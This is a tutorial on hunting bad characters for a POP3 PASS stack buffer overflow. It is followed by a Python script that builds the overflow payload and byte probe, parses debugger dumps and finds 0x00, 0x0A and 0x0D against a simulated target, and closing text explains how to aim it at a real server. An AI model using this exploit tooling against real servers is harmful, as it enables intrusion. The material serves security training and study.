Writing Shellcode for Buffer Overflows – Avoiding Bad Characters


Depending on the application, the vulnerability type, and the protocol in use, certain byte values are "bad": they must not appear anywhere in the buffer, the return address, or the shellcode. The classic example, especially in overflows caused by an unchecked string copy, is the null byte (0x00). A string copy stops at the first null it meets, so a 0x00 inside our buffer truncates everything after it and the rest of the payload never reaches the stack. Another example, specific to the POP3 PASS command, is the carriage return (0x0D): it is part of the line terminator, so the application treats it as the end of the password and stops reading there.

An experienced exploit writer checks for bad characters early, before spending time on a return address or shellcode that can never arrive intact. An easy way to do this is to send every byte value from 0x00 to 0xff, in ascending order, as part of the buffer, and after the crash compare what landed in memory with what was sent. Leave out the values already known to be bad (here 0x00) from the very first attempt; otherwise the copy stops at the first byte and the test shows nothing.

Review the memory dump from the crash, following ESP to where the buffer landed, and compare it byte by byte with the buffer you sent. The values 0x01 through 0x09 arrive intact, but at the position where 0x0A should be the copy stops: the rest of the buffer is missing and memory after that point holds whatever was there before.

0x0A is the Line Feed, and it is bad here for the same reason the Carriage Return is: together they terminate the POP3 command line. Remove \x0A from the list, resend the payload, and compare again, repeating until every byte that was sent shows up unchanged in memory. Note that a bad character does not always truncate the buffer; some are silently replaced by another value, so compare the whole run rather than only looking for where it ends.
To summarize, in this case the buffer, return address and shellcode must not contain any of the following values: 0x00, 0x0A, 0x0D, and the final shellcode has to be generated or encoded with those three excluded.
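The procedure above (probe buffer, crash, compare, remove, resend), worked through in code. This is an added example, not code from the original post: the offset, the return address, the dump lines and the simulated target are constructed placeholders standing in for the real crash and debugger output.

```python
#!/usr/bin/env python3
"""Bad-character hunt for a POP3 PASS overflow (added example, not the
original post's code).  The dump text, offset, return address and the
simulated target below are constructed for illustration."""

# Values known bad before the first probe: the null byte ends the string copy.
KNOWN_BAD = frozenset({0x00})


def badchar_buffer(exclude=KNOWN_BAD):
    """Every byte value 0x00..0xff in ascending order, minus the excluded ones.
    Ascending order matters: the first value that does not show up in memory
    is the next bad character, and nothing after it can be trusted."""
    return bytes(b for b in range(256) if b not in exclude)


def pass_payload(offset, ret, probe):
    """POP3 PASS line: padding up to the saved return address, the address,
    then the probe bytes.  The protocol terminator \\r\\n comes last, which is
    exactly why 0x0D and 0x0A can never appear inside the buffer itself."""
    return b"PASS " + b"A" * offset + ret + probe + b"\r\n"


def parse_hex_dump(dump):
    """Turn debugger dump lines ('ADDRESS  xx xx xx ...') into bytes.
    Assumes the ASCII column has been stripped from each line."""
    out = bytearray()
    for line in dump.strip().splitlines():
        out += bytes(int(tok, 16) for tok in line.split()[1:])
    return bytes(out)


def first_bad_char(sent, observed):
    """Return the first byte of `sent` that did not arrive unchanged in
    `observed`, or None if the whole probe is intact.  Stops at the first
    divergence, because one bad byte truncates or mangles everything behind
    it; later mismatches are noise until that byte is removed and resent."""
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return b
    return None


def hunt(target, exclude=KNOWN_BAD, max_rounds=16):
    """Repeat probe -> crash -> compare -> remove until the buffer arrives
    intact.  `target` takes the probe bytes and returns what the debugger
    shows at ESP.  Returns the sorted list of bad characters found."""
    exclude = set(exclude)
    for _ in range(max_rounds):
        probe = badchar_buffer(exclude)
        bad = first_bad_char(probe, target(probe))
        if bad is None:
            return sorted(exclude)
        exclude.add(bad)
    raise RuntimeError("still finding bad characters after %d rounds" % max_rounds)


# Constructed stand-in for the crashed process: the copy stops at the first
# line-terminator byte and the rest of memory keeps its stale contents.
def simulated_target(probe, stale=b"\x90\xcc" * 8):
    for i, b in enumerate(probe):
        if b in (0x0A, 0x0D):
            return probe[:i] + stale
    return probe


# Constructed dump of the first round: 0x01..0x09 arrived, then stale memory.
CONSTRUCTED_DUMP = """
0012F8A0  01 02 03 04 05 06 07 08
0012F8A8  09 00 00 00 00 00 00 00
"""

if __name__ == "__main__":
    # Round 1 against the constructed dump: 0x0A is the first byte missing.
    print("first bad char: 0x%02x" % first_bad_char(badchar_buffer(), parse_hex_dump(CONSTRUCTED_DUMP)))
    # Full loop against the simulated target: 0x00 (known), then 0x0A, then 0x0D.
    print("bad chars:", ["0x%02x" % b for b in hunt(simulated_target)])
    # The payload as it would be sent, with a placeholder offset and address.
    print(pass_payload(2606, b"\xef\xbe\xad\xde", badchar_buffer({0x00, 0x0A, 0x0D}))[:20])
```

Against a real target, replace `simulated_target` with a function that sends `pass_payload(...)` over the socket, waits for the crash, and returns the bytes pasted from the debugger's dump at ESP through `parse_hex_dump`. Because `first_bad_char` compares the whole run and not only its length, it also catches a byte that was substituted rather than truncated.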
